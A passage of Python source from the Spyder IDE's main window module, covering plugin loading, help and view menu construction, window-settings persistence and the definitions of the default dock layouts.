self.thirdparty_plugins.append(self.profiler)
# Code analysis
if CONF.get("pylint", "enable"):
from spyder.plugins.pylint.plugin import Pylint
self.pylint = Pylint(self, configuration=CONF)
self.register_plugin(self.pylint)
self.thirdparty_plugins.append(self.pylint)
# Third-party plugins
from spyder import dependencies
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'COMPLETION_CLIENT_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(__docs_url__))
self.register_shortcut(doc_action, "_",
"spyder documentation")
spyder_vid = ("https://www.youtube.com/playlist"
"?list=PLPonohdiDqg9epClEcXoAPUiK0pN5eRoc")
vid_action = create_action(self, _("Tutorial videos"),
icon=ima.icon('VideoIcon'),
triggered=lambda:
programs.start_file(spyder_vid))
#----- Tours
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self, self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
self.help_menu_actions = [
doc_action,
vid_action,
# shortcuts_action,
self.tour_action,
MENU_SEPARATOR,
trouble_action,
report_action, dep_action,
self.check_updates_action,
support_action,
MENU_SEPARATOR,
]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
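# (PyQt passes the action's checked state as the first positional
# argument of triggered, so the slot has to accept and ignore it;
# PySide's signature does not.)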
path = file_uri(path)
if API != 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z_]*)(doc)?(-dev)?(-ref)?(-user)?\.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.show_about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus, ClockStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.clock_status = ClockStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
self.tabify_plugin(plugin_instance)
plugin_instance.toggle_view(False)
def setup_menus(self):
"""Setup menus."""
# Update menus list
default_menus = [self.file_menu, self.edit_menu, self.search_menu,
self.source_menu, self.run_menu, self.debug_menu,
self.consoles_menu, self.projects_menu,
self.tools_menu, self.view_menu, self.help_menu]
self.menus = self.menus + default_menus
# Show and hide shortcuts and icons in menus for macOS
if sys.platform == 'darwin':
for menu in self.menus:
if menu is not None:
menu.aboutToShow.connect(
lambda menu=menu: self.show_shortcuts(menu))
menu.aboutToHide.connect(
lambda menu=menu: self.hide_shortcuts(menu))
menu.aboutToShow.connect(
lambda menu=menu: set_menu_icons(menu, False))
menu.aboutToShow.connect(self.hide_options_menus)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for plugin_id, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
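# Run the server in a daemon thread so it cannot keep Spyder alive
# at exit while blocked waiting for incoming connections.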
t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor to Kite completions plugin status
self.editor.kite_completions_file_status()
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Setup menus
self.setup_menus()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
if not running_under_pytest():
# This avoids computing missing deps before the window is fully up
timer_report_deps = QTimer(self)
timer_report_deps.setInterval(2000)
timer_report_deps.setSingleShot(True)
timer_report_deps.timeout.connect(
self.report_missing_dependencies)
timer_report_deps.start()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
self.screen = self.window().windowHandle().screen()
self.current_dpi = self.screen.logicalDotsPerInch()
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, screen):
"""Connect DPI signals for new screen."""
try:
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
except (TypeError, RuntimeError):
# See spyder-ide/spyder#11903 and spyder-ide/spyder#11997
pass
self.screen = screen
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
if self.current_dpi != screen.logicalDotsPerInch():
self.show_dpi_change_message(screen.logicalDotsPerInch())
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
if self.current_dpi == dpi:
# Reconnect DPI scale changes to show a restart message
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
return
if not self.show_dpi_message:
return
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
dismiss_box = QCheckBox(
_("Hide this message during the current session")
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
restart_button = msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.exec_()
if dismiss_box.isChecked():
self.show_dpi_message = False
if msgbox.clickedButton() == restart_button:
# Activate the HDPI auto-scaling option since it is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Reconnect DPI scale changes to show a restart message
# also update current dpi for future checks
self.current_dpi = dpi
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
@Slot()
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
# Declare dependencies before trying to detect the missing ones
dependencies.declare_dependencies()
missing_deps = dependencies.missing_dependencies()
if missing_deps:
# We change '<br>' to '\n' first, so that any '<' appearing in our
# deps can be escaped as '&lt;' (to not break the html formatting),
# and finally we restore '<br>' again.
missing_deps = (missing_deps.replace('<br>', '\n').
replace('<', '&lt;').replace('\n', '<br>'))
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""
Load window layout settings from userconfig-based configuration
with `prefix`, under `section`.
Parameters
----------
default: bool
If True, do not restore inner layout.
"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix + 'size')
prefs_dialog_size = get_func(section, prefix + 'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix + 'state', None)
pos = get_func(section, prefix + 'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix + 'position')
is_maximized = get_func(section, prefix + 'is_maximized')
is_fullscreen = get_func(section, prefix + 'is_fullscreen')
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def get_window_settings(self):
"""
Return current window settings.
Symmetric to the 'set_window_settings' setter.
"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
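# saveState() serializes the dock widget and toolbar layout to a
# QByteArray; it is stored in the config as a plain (hex) string.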
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""
Set window settings.
Symmetric to the 'get_window_settings' accessor.
"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState(
QByteArray().fromHex(str(hexstate).encode('utf-8')))
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""
Save current window settings with `prefix` in
the userconfig-based configuration, under `section`.
"""
# Use current size and position when saving window settings.
# Fixes spyder-ide/spyder#13882
win_size = self.size()
pos = self.pos()
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix + 'size',
(win_size.width(), win_size.height()))
CONF.set(section, prefix + 'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix + 'is_maximized', self.isMaximized())
CONF.set(section, prefix + 'is_fullscreen', self.isFullScreen())
CONF.set(section, prefix + 'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)  # Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix + 'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
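# self.DEFAULT_LAYOUTS is expected to be 4, so this unpacking yields the
# integer indices 0..3 used as keys of the `layouts` dict below.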
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns; each column is organized by rows.
# Column widths have to add up to 100 (except for hidden widgets), and
# the row heights of each column have to add up to 100 as well.
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
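# `index` is the string 'default' on the first run (see setup_layout) or
# one of the integer constants above when called from quick_layout_switch.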
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
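# resizeDocks() distributes the available space proportionally, so the
# width/height fractions above act as relative weights that are expected
# to sum to 100.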
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
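# The modulo makes the layout cycling wrap around at both ends.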
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
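# (the direct lambda presumably stopped working because the triggered
# signal passes its `checked` state as the first positional argument,
# overwriting `i`)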
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
